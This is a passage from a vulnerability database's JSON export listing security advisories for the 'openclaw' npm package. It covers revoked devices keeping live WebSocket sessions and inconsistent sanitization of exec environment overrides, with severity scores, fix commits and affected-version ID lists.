                    "reference_id": "GHSA-qrp5-gfw2-gxv4",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-qrp5-gfw2-gxv4"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109923?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.20",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20"
                }
            ],
            "aliases": [
                "GHSA-qrp5-gfw2-gxv4"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-gkyv-ahk7-1ud3"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91842?format=api",
            "vulnerability_id": "VCID-gvam-2net-8kc5",
            "summary": "OpenClaw's device removal and token revocation do not terminate active WebSocket sessions\n## Summary\n\nRemoving a device or revoking its token updated stored credentials but did not disconnect already-authenticated WebSocket sessions.\n\n## Impact\n\nA revoked device could continue using its existing live session until it next reconnected, so its access outlasted the removal of its credentials.\n\n## Affected Component\n\n`src/gateway/server-methods/devices.ts`, `src/gateway/server.impl.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `7a801cc451` (`Gateway: disconnect revoked device sessions`).\n\nOpenClaw thanks @AntAISecurityLab for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34503",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00012",
                            "scoring_system": "epss",
                            "scoring_elements": "0.01851",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00012",
                            "scoring_system": "epss",
                            "scoring_elements": "0.01855",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00014",
                            "scoring_system": "epss",
                            "scoring_elements": "0.02731",
                            "published_at": "2026-06-07T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34503"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/7a801cc451e9e667b705eeccff651923a1b8c863",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T15:12:24Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/7a801cc451e9e667b705eeccff651923a1b8c863"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2pr2-hcv6-7gwv",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T15:12:24Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2pr2-hcv6-7gwv"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34503",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34503"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-incomplete-websocket-session-termination-on-device-removal-and-token-revocation",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T15:12:24Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-incomplete-websocket-session-termination-on-device-removal-and-token-revocation"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-2pr2-hcv6-7gwv",
                    "reference_id": "GHSA-2pr2-hcv6-7gwv",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-2pr2-hcv6-7gwv"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "CVE-2026-34503",
                "GHSA-2pr2-hcv6-7gwv"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-gvam-2net-8kc5"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91383?format=api",
            "vulnerability_id": "VCID-h9g5-xe4k-6udx",
            "summary": "OpenClaw has Inconsistent Host Exec Environment Override Sanitization\n## Summary\nGateway host exec env override handling did not consistently apply the shared host environment policy, so blocked or malformed override keys could slip through inconsistent sanitization paths.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: `< 2026.3.22`\n- Fixed: `>= 2026.3.22`\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `7abfff756d6c68d17e21d1657bbacbaec86de232`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- `src/infra/host-env-security.ts` now provides one shared sanitizer and fail-closed diagnostics for blocked or malformed override keys.\n- `src/agents/bash-tools.exec.ts` and `src/node-host/invoke-system-run.ts` both route env overrides through the shared sanitizer before execution.\n\nOpenClaw thanks @zpbrent for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35650",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00081",
                            "scoring_system": "epss",
                            "scoring_elements": "0.23939",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00081",
                            "scoring_system": "epss",
                            "scoring_elements": "0.2399",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00081",
                            "scoring_system": "epss",
                            "scoring_elements": "0.24008",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35650"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-10T18:22:30Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/7abfff756d6c68d17e21d1657bbacbaec86de232",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-10T18:22:30Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/7abfff756d6c68d17e21d1657bbacbaec86de232"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-39pp-xp36-q6mg",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-10T18:22:30Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-39pp-xp36-q6mg"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35650",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35650"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-environment-variable-override-bypass-via-inconsistent-sanitization",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-10T18:22:30Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-environment-variable-override-bypass-via-inconsistent-sanitization"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-39pp-xp36-q6mg",
                    "reference_id": "GHSA-39pp-xp36-q6mg",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-39pp-xp36-q6mg"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-26sv-grsd-abcw"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
